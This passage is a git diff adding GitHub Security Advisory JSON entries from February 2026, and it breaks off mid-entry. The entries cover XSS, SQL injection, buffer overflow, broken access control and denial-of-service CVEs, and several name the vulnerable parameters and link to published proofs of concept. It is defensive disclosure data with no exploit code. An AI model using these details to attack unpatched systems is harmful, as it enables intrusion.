@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmfh-36xp-5j94", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25314" + ], + "details": "Missing Authorization vulnerability in WP Messiah TOP Table Of Contents top-table-of-contents allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TOP Table Of Contents: from n/a through <= 1.3.31.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25314" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/top-table-of-contents/vulnerability/wordpress-top-table-of-contents-plugin-1-3-31-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmh8-3qx8-2rqv/GHSA-pmh8-3qx8-2rqv.json b/advisories/unreviewed/2026/02/GHSA-pmh8-3qx8-2rqv/GHSA-pmh8-3qx8-2rqv.json new file mode 100644 index 0000000000000..92a2889ac12be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmh8-3qx8-2rqv/GHSA-pmh8-3qx8-2rqv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmh8-3qx8-2rqv", + "modified": "2026-02-16T18:31:28Z", + "published": "2026-02-16T18:31:28Z", + "aliases": [ + "CVE-2026-2101" + ], + "details": "A Reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIAvpm Web Access from ENOVIAvpm Version 1 Release 16 through ENOVIAvpm Version 1 Release 19 allows an attacker to execute arbitrary script code in user's browser session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2101" + }, + { + "type": "WEB", + "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2026-2101" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T17:18:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmq3-mh37-3fc8/GHSA-pmq3-mh37-3fc8.json b/advisories/unreviewed/2026/02/GHSA-pmq3-mh37-3fc8/GHSA-pmq3-mh37-3fc8.json new file mode 100644 index 0000000000000..f7c37a0cf6c3f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmq3-mh37-3fc8/GHSA-pmq3-mh37-3fc8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmq3-mh37-3fc8", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37203" + ], + "details": "Office Product Key Finder 1.5.4 contains a denial of service vulnerability that allows attackers to crash the application by manipulating the registration code input. Attackers can create a specially crafted text file and paste it into the 'Name and Key' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37203" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47867" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/office-product-key-finder-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmxf-4m9g-jv6w/GHSA-pmxf-4m9g-jv6w.json b/advisories/unreviewed/2026/02/GHSA-pmxf-4m9g-jv6w/GHSA-pmxf-4m9g-jv6w.json new file mode 100644 index 0000000000000..7b6c6ac83d113 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmxf-4m9g-jv6w/GHSA-pmxf-4m9g-jv6w.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmxf-4m9g-jv6w", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-1187" + ], + "details": "The ZoomifyWP Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filename' parameter of the 'zoomify' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1187" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/tz-zoomifywp-free/tags/1.1/zoomifyWP-free.php#L54" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/tz-zoomifywp-free/trunk/zoomifyWP-free.php#L54" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/tz-zoomifywp-free" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f1fa59e0-c946-40d3-a817-c9924b4588fa?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmxm-x3p3-w327/GHSA-pmxm-x3p3-w327.json b/advisories/unreviewed/2026/02/GHSA-pmxm-x3p3-w327/GHSA-pmxm-x3p3-w327.json new file mode 100644 index 0000000000000..d79ea62023680 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmxm-x3p3-w327/GHSA-pmxm-x3p3-w327.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmxm-x3p3-w327", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23180" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndpaa2-switch: add bounds check for if_id in IRQ handler\n\nThe IRQ handler extracts if_id from the upper 16 bits of the hardware\nstatus register and uses it to index into ethsw->ports[] without\nvalidation. Since if_id can be any 16-bit value (0-65535) but the ports\narray is only allocated with sw_attr.num_ifs elements, this can lead to\nan out-of-bounds read potentially.\n\nAdd a bounds check before accessing the array, consistent with the\nexisting validation in dpaa2_switch_rx().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23180" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1b381a638e1851d8cfdfe08ed9cdbec5295b18c9" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2447edc367800ba914acf7ddd5d250416b45fb31" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/31a7a0bbeb006bac2d9c81a2874825025214b6d8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/34b56c16efd61325d80bf1d780d0e176be662f59" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/77611cab5bdfff7a070ae574bbfba20a1de99d1b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f89e33c9c37f0001b730e23b3b05ab7b1ecface2" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp3p-7vvq-9rj5/GHSA-pp3p-7vvq-9rj5.json b/advisories/unreviewed/2026/02/GHSA-pp3p-7vvq-9rj5/GHSA-pp3p-7vvq-9rj5.json new file mode 100644 index 0000000000000..a34ffbfc92b2f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp3p-7vvq-9rj5/GHSA-pp3p-7vvq-9rj5.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp3p-7vvq-9rj5", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-27569" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27569" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json b/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json new file mode 100644 index 0000000000000..2a1ec8942870d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp6p-hwf9-pcpx", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-2627" + ], + "details": "A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\\Program Files\\Common Files\\microsoft shared\\ink\\HID.dll of the component Backup/Restore. The manipulation results in link following. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2627" + }, + { + "type": "WEB", + "url": "https://github.com/thezdi/PoC/tree/main/FilesystemEoPs" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752050" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp78-hqqc-jrrq/GHSA-pp78-hqqc-jrrq.json b/advisories/unreviewed/2026/02/GHSA-pp78-hqqc-jrrq/GHSA-pp78-hqqc-jrrq.json new file mode 100644 index 0000000000000..87ed47e341650 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp78-hqqc-jrrq/GHSA-pp78-hqqc-jrrq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp78-hqqc-jrrq", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2319" + ], + "details": "Race in DevTools in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures and install a malicious extension to potentially exploit object corruption via a malicious file. (Chromium security severity: Medium)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2319" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/40071155" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp8p-hrmg-pjhx/GHSA-pp8p-hrmg-pjhx.json b/advisories/unreviewed/2026/02/GHSA-pp8p-hrmg-pjhx/GHSA-pp8p-hrmg-pjhx.json new file mode 100644 index 0000000000000..eb3c5863e1b5e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp8p-hrmg-pjhx/GHSA-pp8p-hrmg-pjhx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp8p-hrmg-pjhx", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25416" + ], + "details": "Missing Authorization vulnerability in blazethemes News Kit Elementor Addons news-kit-elementor-addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects News Kit Elementor Addons: from n/a through <= 1.4.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25416" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/news-kit-elementor-addons/vulnerability/wordpress-news-kit-elementor-addons-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json new file mode 100644 index 0000000000000..5dbb96038594a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pppv-pc54-6j8r", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-2661" + ], + "details": "A security flaw has been discovered in Squirrel up to 3.2. This affects the function SQObjectPtr::operator in the library squirrel/sqobject.h. The manipulation results in heap-based buffer overflow. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2661" + }, + { + "type": "WEB", + "url": "https://github.com/albertodemichelis/squirrel/issues/310" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i310/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ppq7-wpmg-vgf2/GHSA-ppq7-wpmg-vgf2.json b/advisories/unreviewed/2026/02/GHSA-ppq7-wpmg-vgf2/GHSA-ppq7-wpmg-vgf2.json new file mode 100644 index 0000000000000..df67228634cdf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ppq7-wpmg-vgf2/GHSA-ppq7-wpmg-vgf2.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ppq7-wpmg-vgf2", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-24300" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24300" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json new file mode 100644 index 0000000000000..558cd8091de45 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqh8-xq2x-mwg2", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-26732" + ], + "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the vpnUser or vpnPassword` parameters in the formFilter function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26732" + }, + { + "type": "WEB", + "url": "https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RU-boa-formFilter-StackOverflow" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pqwv-wwjj-f9gv/GHSA-pqwv-wwjj-f9gv.json b/advisories/unreviewed/2026/02/GHSA-pqwv-wwjj-f9gv/GHSA-pqwv-wwjj-f9gv.json new file mode 100644 index 0000000000000..55edd88816445 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pqwv-wwjj-f9gv/GHSA-pqwv-wwjj-f9gv.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqwv-wwjj-f9gv", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37207" + ], + "details": "SpotDialup 1.6.7 contains a denial of service vulnerability in the registration key input field that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the 'Key' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37207" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47872" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotdialup-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pr25-8xv2-wpjq/GHSA-pr25-8xv2-wpjq.json b/advisories/unreviewed/2026/02/GHSA-pr25-8xv2-wpjq/GHSA-pr25-8xv2-wpjq.json new file mode 100644 index 0000000000000..00f5899e015cc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pr25-8xv2-wpjq/GHSA-pr25-8xv2-wpjq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pr25-8xv2-wpjq", + "modified": "2026-02-14T09:31:34Z", + "published": "2026-02-14T09:31:34Z", + "aliases": [ + "CVE-2026-1258" + ], + "details": "The Mail Mint plugin for WordPress is vulnerable to blind SQL Injection via the 'forms', 'automation', 'email/templates', and 'contacts/import/tutorlms/map' API endpoints in all versions up to, and including, 1.19.2 . This is due to insufficient escaping on the user supplied 'order-by', 'order-type', and 'selectedCourses' parameters and lack of sufficient preparation on the existing SQL queries. This makes it possible for authenticated attackers, with administrator level access and above, to append additional SQL queries into already existing queries.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1258" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449536/mail-mint/trunk/app/API/Actions/Admin/Email/TemplateAction.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449536/mail-mint/trunk/app/Database/models/FormModel.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449536/mail-mint/trunk/app/Internal/Automation/Core/DataStore/AutomationStore.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449536/mail-mint/trunk/app/Utilities/Helper/Import.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dfb59bca-0653-4e75-8da1-e78e5d659422?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T09:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pr2h-8f83-vhfr/GHSA-pr2h-8f83-vhfr.json b/advisories/unreviewed/2026/02/GHSA-pr2h-8f83-vhfr/GHSA-pr2h-8f83-vhfr.json new file mode 100644 index 0000000000000..18c24a6aeff59 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pr2h-8f83-vhfr/GHSA-pr2h-8f83-vhfr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pr2h-8f83-vhfr", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-1047" + ], + "details": "The salavat counter Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'image_url' parameter in all versions up to, and including, 0.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1047" + }, + { + "type": "WEB", + "url": "https://downloads.wordpress.org/plugin/salavat-counter.zip" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/salavat-counter/tags/0.9.5/wp-table-options.php#L352" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/salavat-counter/trunk/wp-table-options.php#L352" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/salavat-counter" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6696b262-c6e5-4413-b7dc-894965daa5ac?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json b/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json new file mode 100644 index 0000000000000..0de0091afbe14 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pr6p-6x97-5c59", + "modified": "2026-02-12T18:30:22Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-46310" + ], + "details": "This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.7.4, macOS Sonoma 14.8.4. An attacker with root privileges may be able to delete protected system files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46310" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-prg6-5jr3-w97r/GHSA-prg6-5jr3-w97r.json b/advisories/unreviewed/2026/02/GHSA-prg6-5jr3-w97r/GHSA-prg6-5jr3-w97r.json new file mode 100644 index 0000000000000..8152661a9af00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-prg6-5jr3-w97r/GHSA-prg6-5jr3-w97r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prg6-5jr3-w97r", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2706" + ], + "details": "A flaw has been found in code-projects Patient Record Management System 1.0. This affects an unknown function of the file /fecalysis_not.php. This manipulation of the argument comp_id causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2706" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://github.com/1768161086/sql_cve" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346652" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346652" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754407" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-prgq-3hfx-hfpx/GHSA-prgq-3hfx-hfpx.json b/advisories/unreviewed/2026/02/GHSA-prgq-3hfx-hfpx/GHSA-prgq-3hfx-hfpx.json new file mode 100644 index 0000000000000..a410ab55a2d4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-prgq-3hfx-hfpx/GHSA-prgq-3hfx-hfpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + 